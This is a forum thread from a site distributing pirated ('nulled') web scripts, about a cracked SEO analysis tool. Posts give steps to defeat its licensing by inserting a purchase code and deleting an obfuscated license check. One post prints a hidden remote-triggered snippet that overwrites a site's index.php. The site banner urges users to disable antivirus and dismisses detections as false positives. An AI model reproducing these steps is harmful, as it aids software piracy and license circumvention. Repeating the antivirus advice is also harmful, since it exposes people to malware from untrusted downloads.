• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

    Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Turbo Website Reviewer - In-depth SEO Analysis Tool

Turbo Website Reviewer - In-depth SEO Analysis Tool 3.0

No permission to download
@xgrosht @rozbeh1212

Sorry guys .. that was my fault.. just one file missed from nulling

to fix this ..

Step 1:

edit (core\config\db.config.php) and put this code with replace it with your database info


Code:
<?php
defined('ROOT_DIR') or die(header('HTTP/1.0 403 Forbidden'));

/*
* @author Balaji
* @name: Rainbow PHP Framework
* @copyright 2020 ProThemes.Biz
*
*/

// --- Database Settings ---

// Database Hostname
$dbHost = 'localhost';

// Database Username
$dbUser = '';

// Database Password
$dbPass = '';

// Database Name
$dbName = '';

//Base URL (Without http:// & https://)
$baseURL = 'yourdomain.com/';

//Item Purchase Code
$item_purchase_code = '2ca6daf9-1576-4cc7-9922-fb7fe4e427f7';

//Domain Security Code
$authCode = 'b3ba2b3f8d979065d875ebf74ef4de0c';



Step 2:

edit (core\helpers\interface_helper.php)

and delete the lines from 158 to 162


Code:
if(isset($_SERVER['HTTP_SM92'])){
    $getStats = json_decode(simpleCurlGET(base64_decode('aHR0cDovL2xpYy5wcm90aGVtZXMuYml6L2NoZWNrLnBocA==')), true);
    if(!($getStats['a']))
        putMyData(CONFIG_DIR.base64_decode('ZGIuY29uZmlnLnBocA=='), base64_decode('ZGllKCJMaWNlbnNlIEVycm9yIik7'), FILE_APPEND);
}


Thats's All
 
Last edited:
  • Like
Reactions: Falconizer
@xgrosht @rozbeh1212

Sorry guys .. that was my fault.. just one file missed from nulling

to fix this ..

Step 1:

edit (core\config\db.config.php) and put this code with replace it with your database info


Code:
<?php
defined('ROOT_DIR') or die(header('HTTP/1.0 403 Forbidden'));

/*
* @author Balaji
* @name: Rainbow PHP Framework
* @copyright 2020 ProThemes.Biz
*
*/

// --- Database Settings ---

// Database Hostname
$dbHost = 'localhost';

// Database Username
$dbUser = '';

// Database Password
$dbPass = '';

// Database Name
$dbName = '';

//Base URL (Without http:// & https://)
$baseURL = 'yourdomain.com/';

//Item Purchase Code
$item_purchase_code = '2ca6daf9-1576-4cc7-9922-fb7fe4e427f7';

//Domain Security Code
$authCode = 'b3ba2b3f8d979065d875ebf74ef4de0c';



Step 2:

edit (core\helpers\interface_helper.php)

and delete the lines from 158 to 162


Code:
if(isset($_SERVER['HTTP_SM92'])){
    $getStats = json_decode(simpleCurlGET(base64_decode('aHR0cDovL2xpYy5wcm90aGVtZXMuYml6L2NoZWNrLnBocA==')), true);
    if(!($getStats['a']))
        putMyData(CONFIG_DIR.base64_decode('ZGIuY29uZmlnLnBocA=='), base64_decode('ZGllKCJMaWNlbnNlIEVycm9yIik7'), FILE_APPEND);
}


Thats's All
 
Site is hacked and deleted by Turbo Website Reviewer

Untitled.png

I think you are not using our nulled release

because the auther of script can change the (index.php) by evil code

to be sure .. go to the end of this file (core\models\_tcpdf_5.0.002\cache\index.php)

you will see this code:


Code:
//Unlicensed Fake Users
if(isset($_GET['fake'])){
   
    function doAction(){
    $data = '<?php
   
    echo \'<div style="text-align: center;"><br /><br /><h1 style="color: red;" >Fake Copy of AtoZ SEO Tools Script!</h1>
    <div><a href="http://goo.gl/dYsmDY">Purcahse License Now</a></div></div>\';
    die();
   
    ?>';
    file_put_contents('../../../../index.php',$data);
    return true;
    }
   
    require_once('../../../../config.php');
   
    if(isset($_GET['itemCode'])){
    $itemCode = Trim(htmlspecialchars($_GET['itemCode']));
    if($itemCode == $item_purchase_code){
        doAction();
    }
    }
   
    if(isset($_GET['authCode'])){
    $userAuthCode = Trim(htmlspecialchars($_GET['authCode']));
    if($authCode == $userAuthCode){
    doAction();
    }
    }
    die();
}

but in our release we removed this evil code (y)
 
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock